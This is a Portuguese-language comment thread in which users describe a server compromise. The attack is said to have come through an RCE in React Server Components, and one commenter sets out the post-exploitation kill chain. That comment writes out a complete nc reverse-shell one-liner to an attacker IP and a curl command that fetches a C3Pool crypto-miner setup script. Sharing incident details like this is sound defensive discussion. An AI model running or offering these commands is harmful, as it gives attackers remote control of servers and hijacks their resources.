Interessante... você pode compartilhar mais sobre "ataque sofisticado que explorou uma brecha...". O que foi explorado, exatamente? Apenas curiosidade.
3
1
Mano é tipo de hacker muito novo...ele assume recursos do seu servidor, brecha de segurança muito grande! dependendo da sua infra-estrutura ele pode acessar outras maquinas, comprometer banco de dados, e instalar recursos no seu servidor etc até mesmo pedir resgate sobre seus dados!
Forma de attack em 05 etapas!
1.Reverse Shell (Backdoor)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 171.252.32.135 7700 >/tmp/f
literalmente IP do atacante (171.252.32.135) no firewall..
2.instalação de malwares via scripts.sh
3.Instalação do Minerador de Criptomoeda (C3Pool)
curl https://gist.githubusercontent.com/demonic-agents/39e943f4de855e2aef12f34324cbf150/raw/.../setup_c3pool_miner.sh
4.Tentativa de Reinicialização e assumir maquina (Falhou por falta de privilégios (sorte!))
shutdown -r now
daqui pra frente ele livre acesso!
5.Depois tenta esconder seus rastros para que administrador não consiga perceber!
@ErickWendelAcademy
tmb foi atacado da msm forma! fez até video sobre se quiser saber mais ele explica direitinho!
https://www.youtube.com/watch?v=5ygcZt2Co7w&list=PLqFwRPueWb5dtayur87Zegfvi7QrwAQSM
1
Beleza, já entendi, foi um 0-day do React/Vercel.
É que "Reverse shell" é a consequência da exploração de uma falha. Eu tava curioso pra saber QUAL foi a falha. No caso do video, ao menos, foi o React.
2
Bem observado. No caso do vídeo do Erick, o vetor foi realmente o RCE nos Server Components. O que destaquei aqui foi a kill chain (o comportamento pós-exploração), que costuma seguir esse padrão independentemente da porta de entrada.
Mas sim, a falha partiu do React! É tenso pensar que alguém de alto escalão liberou uma versão oficial com uma brecha dessas para a massa de usuários.